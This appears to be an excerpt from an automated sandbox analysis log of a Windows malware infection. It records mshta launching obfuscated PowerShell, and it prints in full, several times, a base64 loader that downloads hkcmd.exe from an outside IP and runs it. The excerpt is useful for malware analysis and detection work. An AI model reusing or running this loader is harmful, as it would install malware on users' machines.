                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWErsHelL.Exe -Ex bypASs -NOP -w 1 -c DEVICeCReDeNTiALdePloYmenT.eXE ; IeX($(iex('[sYSteM.tExt.eNcoDiNG]'+[CHAR]58+[cHAr]0x3A+'UTf8.geTsTRiNg([SYstem.cOnVeRt]'+[CHAR]0X3A+[cHaR]58+'fromBASe64sTrInG('+[CHar]0x22+'JGIySTFwOXZidlcxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJlUmRlZklOaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVhVQkhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRU5aemdQLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcnNxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpLS3dOalVuc3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJETFEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJDYUxKayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYjJJMXA5dmJ2VzE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjcuMTgvMzQ2L2hrY21kLmV4ZSIsIiRlTlY6QVBQREFUQVxoa2NtZC5leGUiLDAsMCk7U1RBUnQtc2xlZVAoMyk7aW52T0tFLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGhrY21kLmV4ZSI='+[cHar]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWErsHelL.Exe -Ex bypASs -NOP -w 1 -c DEVICeCReDeNTiALdePloYmenT.eXE ; IeX($(iex('[sYSteM.tExt.eNcoDiNG]'+[CHAR]58+[cHAr]0x3A+'UTf8.geTsTRiNg([SYstem.cOnVeRt]'+[CHAR]0X3A+[cHaR]58+'fromBASe64sTrInG('+[CHar]0x22+'JGIySTFwOXZidlcxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJlUmRlZklOaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVhVQkhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRU5aemdQLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcnNxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpLS3dOalVuc3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJETFEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJDYUxKayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYjJJMXA5dmJ2VzE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjcuMTgvMzQ2L2hrY21kLmV4ZSIsIiRlTlY6QVBQREFUQVxoa2NtZC5leGUiLDAsMCk7U1RBUnQtc2xlZVAoMyk7aW52T0tFLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGhrY21kLmV4ZSI='+[cHar]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sgkiriu3\sgkiriu3.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\hkcmd.exe "C:\Users\user\AppData\Roaming\hkcmd.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6A77.tmp" "c:\Users\user\AppData\Local\Temp\sgkiriu3\CSC38C97BC6FA854DE2B4DB5ADB17FE40F2.TMP"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\hkcmd.exe" Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jgiystfwoxzidlcxicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefkrc1uwxbficagicagicagicagicagicagicagicagicagicagicaglw1ftujlumrlzkloaxrjt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmbu9oiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagqvhvqkhzlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagihysc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagru5aemdqlhvpbnqgicagicagicagicagicagicagicagicagicagicagicbdcnnxleludfb0ciagicagicagicagicagicagicagicagicagicagicagigpls3doalvuc3gpoycgicagicagicagicagicagicagicagicagicagicagicatbkftzsagicagicagicagicagicagicagicagicagicagicagicjetfeiicagicagicagicagicagicagicagicagicagicagicaglu5bbuvtuefjrsagicagicagicagicagicagicagicagicagicagicagigjdyuxkayagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakyjjjmxa5dmj2vze6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xmdqumty4ljcumtgvmzq2l2hry21klmv4zsisiirltly6qvbqrefuqvxoa2ntzc5leguildasmck7u1rbunqtc2xlzvaomyk7aw52t0tflwl0zw0gicagicagicagicagicagicagicagicagicagicagicaijgvodjpbufbeqvrbxghry21klmv4zsi='+[char]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jgiystfwoxzidlcxicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefkrc1uwxbficagicagicagicagicagicagicagicagicagicagicaglw1ftujlumrlzkloaxrjt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmbu9oiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagqvhvqkhzlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagihysc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagru5aemdqlhvpbnqgicagicagicagicagicagicagicagicagicagicagicbdcnnxleludfb0ciagicagicagicagicagicagicagicagicagicagicagigpls3doalvuc3gpoycgicagicagicagicagicagicagicagicagicagicagicatbkftzsagicagicagicagicagicagicagicagicagicagicagicjetfeiicagicagicagicagicagicagicagicagicagicagicaglu5bbuvtuefjrsagicagicagicagicagicagicagicagicagicagicagigjdyuxkayagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakyjjjmxa5dmj2vze6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xmdqumty4ljcumtgvmzq2l2hry21klmv4zsisiirltly6qvbqrefuqvxoa2ntzc5leguildasmck7u1rbunqtc2xlzvaomyk7aw52t0tflwl0zw0gicagicagicagicagicagicagicagicagicagicagicaijgvodjpbufbeqvrbxghry21klmv4zsi='+[char]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jgiystfwoxzidlcxicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefkrc1uwxbficagicagicagicagicagicagicagicagicagicagicaglw1ftujlumrlzkloaxrjt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmbu9oiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagqvhvqkhzlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagihysc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagru5aemdqlhvpbnqgicagicagicagicagicagicagicagicagicagicagicbdcnnxleludfb0ciagicagicagicagicagicagicagicagicagicagicagigpls3doalvuc3gpoycgicagicagicagicagicagicagicagicagicagicagicatbkftzsagicagicagicagicagicagicagicagicagicagicagicjetfeiicagicagicagicagicagicagicagicagicagicagicaglu5bbuvtuefjrsagicagicagicagicagicagicagicagicagicagicagigjdyuxkayagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakyjjjmxa5dmj2vze6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xmdqumty4ljcumtgvmzq2l2hry21klmv4zsisiirltly6qvbqrefuqvxoa2ntzc5leguildasmck7u1rbunqtc2xlzvaomyk7aw52t0tflwl0zw0gicagicagicagicagicagicagicagicagicagicagicaijgvodjpbufbeqvrbxghry21klmv4zsi='+[char]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jgiystfwoxzidlcxicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefkrc1uwxbficagicagicagicagicagicagicagicagicagicagicaglw1ftujlumrlzkloaxrjt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmbu9oiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagqvhvqkhzlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagihysc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagru5aemdqlhvpbnqgicagicagicagicagicagicagicagicagicagicagicbdcnnxleludfb0ciagicagicagicagicagicagicagicagicagicagicagigpls3doalvuc3gpoycgicagicagicagicagicagicagicagicagicagicagicatbkftzsagicagicagicagicagicagicagicagicagicagicagicjetfeiicagicagicagicagicagicagicagicagicagicagicaglu5bbuvtuefjrsagicagicagicagicagicagicagicagicagicagicagigjdyuxkayagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakyjjjmxa5dmj2vze6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xmdqumty4ljcumtgvmzq2l2hry21klmv4zsisiirltly6qvbqrefuqvxoa2ntzc5leguildasmck7u1rbunqtc2xlzvaomyk7aw52t0tflwl0zw0gicagicagicagicagicagicagicagicagicagicagicaijgvodjpbufbeqvrbxghry21klmv4zsi='+[char]0x22+'))')))"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EA7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,12_2_00EA7CAF
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EA874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,12_2_00EA874B
                    Source: hkcmd.exe, 0000000C.00000000.1298701172.0000000000F04000.00000002.00000001.01000000.0000000A.sdmp, hkcmd.exe.3.dr, hkcmd[1].exe.3.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: hkcmd.exeBinary or memory string: Shell_TrayWnd
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E7862B cpuid 12_2_00E7862B
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
